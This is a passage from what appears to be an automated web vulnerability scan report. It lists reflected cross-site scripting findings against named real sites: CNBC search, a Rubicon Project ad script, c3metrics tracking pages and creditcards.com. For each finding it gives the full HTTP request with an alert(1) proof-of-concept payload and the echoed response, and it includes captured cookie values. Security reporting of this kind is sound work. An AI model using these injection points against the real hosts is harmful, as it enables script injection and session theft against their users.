GET /main.do?target=all&keywords=xss36c5e</title><script>alert(1)</script>2789f6ff334a89918&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USERFONTSIZE=1; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2001|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_321|Q_316; __qca=P0-1930011807-1308223509319; s_nr=1308223605121

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:27:33 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 71248
X-Aicache-OS: 64.210.194.245:80
Connection: close
Expires: Thu, 16 Jun 2011 11:37:33 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss36c5e</title><
...[SNIP]...
<title>xss36c5e</title><script>alert(1)</script>2789f6ff334a89918 - CNBC</title>
...[SNIP]...

3.147. http://search.cnbc.com/main.do [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a34b</script><script>alert(1)</script>7c5fa54ba36cca68 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /main.do?target=all&keywords=xss3a34b</script><script>alert(1)</script>7c5fa54ba36cca68&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USERFONTSIZE=1; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2001|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_321|Q_316; __qca=P0-1930011807-1308223509319; s_nr=1308223605121

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:27:32 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 71248
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Thu, 16 Jun 2011 11:37:32 GMT

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss3a34b</script>
...[SNIP]...
<script>

keyWordParam = "xss3a34b</script><script>alert(1)</script>7c5fa54ba36cca68";
keyWordParam = keyWordParam.replace(/"/g,'"');
document.getElementById('txtBox').value = keyWordParam;

</script>
...[SNIP]...

3.148. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 71559%3balert(1)//11a64e5eb58 was submitted in the cb parameter. This input was echoed as 71559;alert(1)//11a64e5eb58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded71559%3balert(1)//11a64e5eb58&pc=6451/11953 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111; cd=false; dq=11|4|7|0

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:28:46 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 859
Cache-control: private
Set-Cookie: khaos=GOVBRMNC-I-DXQD; Domain=.rubiconproject.com; Expires=Fri, 14-Jun-2019 11:28:46 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "",
tags : "Education,Mortgage Refinance,Business,Small Business,Finance",
tagcloud : [
{ tag: "Education", weight: 44},
{ tag: "Mortg
...[SNIP]...
2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};

try {
oz_onPixelsLoaded71559;alert(1)//11a64e5eb58(oo_profile);
} catch(ignore) {}

3.149. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 125cd(a)a5c3353b29 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded125cd(a)a5c3353b29&pc=6451/11953 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263811%3D1%262374%3D1; cd=false; dq=26|4|22|0; ses2=11953^13; csi2=3187870.js^11^1308226504^1308230230&1295153.js^1^1308228373^1308228373&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^18; csi15=3187871.js^15^1308225219^1308230230&3206204.js^3^1308225202^1308227128

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:17:47 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 921
Cache-control: private
Set-Cookie: khaos=GOVBRMNC-I-DXQD; Domain=.rubiconproject.com; Expires=Fri, 14-Jun-2019 13:17:47 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "",
tags : "Mortgage Refinance,Finance and Money,Finance,Small Business,Business,Republicans",
tagcloud : [
{ tag: "Mortgage Refinance", w
...[SNIP]...
2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};

try {
oz_onPixelsLoaded125cd(a)a5c3353b29(oo_profile);
} catch(ignore) {}

3.150. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload b4e30<script>alert(1)</script>58eee1a882b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480b4e30<script>alert(1)</script>58eee1a882b&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:33:49 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480b4e30<script>alert(1)</script>58eee1a882b-SM=advertop100_06-16-2011-18-33-49; expires=Sun, 19-Jun-2011 18:33:49 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480b4e30<script>alert(1)</script>58eee1a882b-VT=advertop100_06-16-2011-18-33-49_6865928921308249229; expires=Tue, 14-Jun-2016 18:33:49 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480b4e30<script>alert(1)</script>58eee1a882b-nUID=advertop100_6865928921308249229; expires=Thu, 16-Jun-2011 18:48:49 GMT; path=/; domain=c3metrics.com
Content-Length: 6697
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
JScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='advertop100';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480b4e30<script>alert(1)</script>58eee1a882b';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='6865928921308249229';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this
...[SNIP]...

3.151. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 3f7f8<script>alert(1)</script>bf98f80327a was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=advertop1003f7f8<script>alert(1)</script>bf98f80327a&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:33:20 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 18:33:20 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-18-06-44_13548876581308247604ZZZZadvertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadvertop1003f7f8%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebf98f80327a_06-16-2011-18-33-20_8147888571308249200; expires=Tue, 14-Jun-2016 18:33:20 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=advertop100_15277004981308249159ZZZZadvertop1003f7f8%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebf98f80327a_8147888571308249200; expires=Thu, 16-Jun-2011 18:48:20 GMT; path=/; domain=c3metrics.com
Content-Length: 6697
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
JScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='advertop1003f7f8<script>alert(1)</script>bf98f80327a';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8147888571308249200';th
...[SNIP]...

3.152. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4c8dc<script>alert(1)</script>40da8b6b2b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=72&rv=&uid=/4c8dc<script>alert(1)</script>40da8b6b2b4&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:36:38 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 18:36:38 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-18-06-44_13548876581308247604ZZZZadvertop100_06-16-2011-18-36-38_13867066701308249398; expires=Tue, 14-Jun-2016 18:36:38 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=advertop100_13867066701308249398; expires=Thu, 16-Jun-2011 18:51:38 GMT; path=/; domain=c3metrics.com
Content-Length: 6686
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='13867066701308249398';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/4c8dc<script>alert(1)</script>40da8b6b2b4';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

3.153. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 45df8<script>alert(1)</script>e78aa7bab2e was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=72&rv=45df8<script>alert(1)</script>e78aa7bab2e&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:34:33 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 18:34:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-18-06-44_13548876581308247604ZZZZadvertop100_06-16-2011-18-34-33_8496550131308249273; expires=Tue, 14-Jun-2016 18:34:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=advertop100_8496550131308249273; expires=Thu, 16-Jun-2011 18:49:33 GMT; path=/; domain=c3metrics.com
Content-Length: 6696
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
d='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8496550131308249273';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='45df8<script>alert(1)</script>e78aa7bab2e';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

3.154. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 3da70<script>alert(1)</script>751d22e789c was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=723da70<script>alert(1)</script>751d22e789c&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:34:16 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sat, 16-Jul-2011 21:34:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-18-06-44_13548876581308247604ZZZZadvertop100_06-16-2011-18-34-16_11507968961308249256; expires=Tue, 14-Jun-2016 18:34:16 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=advertop100_11507968961308249256; expires=Thu, 16-Jun-2011 18:49:16 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='11507968961308249256';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='723da70<script>alert(1)</script>751d22e789c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

3.155. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 411e6<script>alert(1)</script>1f9b08cb1b9 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=72&rv=&uid=411e6<script>alert(1)</script>1f9b08cb1b9&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:34:45 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 18:34:45 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-18-06-44_13548876581308247604ZZZZadvertop100_06-16-2011-18-34-45_15833724061308249285; expires=Tue, 14-Jun-2016 18:34:45 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=advertop100_15833724061308249285; expires=Thu, 16-Jun-2011 18:49:45 GMT; path=/; domain=c3metrics.com
Content-Length: 6685
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='15833724061308249285';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='411e6<script>alert(1)</script>1f9b08cb1b9';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

3.156. http://www.creditcards.com/0-apr-credit-cards.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/0-apr-credit-cards.php

Issue detail

